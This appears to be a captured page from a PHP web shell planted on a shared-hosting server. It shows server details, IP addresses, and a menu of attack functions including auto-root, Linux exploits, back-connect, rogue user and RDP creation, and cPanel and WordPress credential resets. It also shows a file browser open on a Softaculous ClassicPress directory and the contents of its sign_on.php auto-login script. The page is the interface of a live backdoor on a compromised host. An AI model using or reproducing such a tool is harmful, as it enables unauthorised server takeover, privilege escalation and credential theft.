Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
classicpress /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
482
B
-rw-r--r--
_htaccess
333
B
-rw-r--r--
_index.php
59
B
-rw-r--r--
_wp-config.php
3.44
KB
-rw-r--r--
check_charset.php
1.82
KB
-rw-r--r--
classicpress.sql
29.67
KB
-rw-r--r--
classicpress.zip
10.84
MB
-rw-r--r--
clone.php
15.71
KB
-rw-r--r--
edit.php
5.16
KB
-rw-r--r--
edit.xml
628
B
-rw-r--r--
extend.php
3.96
KB
-rw-r--r--
fileindex.php
305
B
-rw-r--r--
import.php
5.71
KB
-rw-r--r--
info.xml
2.89
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
19.64
KB
-rw-r--r--
install.xml
1.23
KB
-rw-r--r--
md5
3.76
KB
-rw-r--r--
multisite.sql
37.09
KB
-rw-r--r--
notes.txt
1.76
KB
-rw-r--r--
sign_on.php
1010
B
-rw-r--r--
soft.htaccess
127
B
-rw-r--r--
wp-config.php
3.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sign_on.php
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } // Dummy plugin dir so that no plugins are loaded as they conflict with our login process define('WP_PLUGIN_DIR', '[[softpath]]/[[autopass]]'); require('wp-blog-header.php'); require('wp-includes/pluggable.php'); $signon_user = '[[signon_username]]'; //Backword compatibility ($__setting['signon_username'] won't be there in previous versions <= 5.2.3) if(!empty($signon_user) && !preg_match('/^\[\[(.*?)\]\]$/is', $signon_user)){ $user = get_user_by('login', $signon_user); }else{ $user_info = get_userdata(1); // Automatic login // $username = $user_info->user_login; $user = get_user_by('login', $username); } // Redirect URL // if ( !is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user ( $user->ID ); wp_set_auth_cookie ( $user->ID ); $redirect_to = admin_url(); wp_safe_redirect( $redirect_to ); exit(); }
Close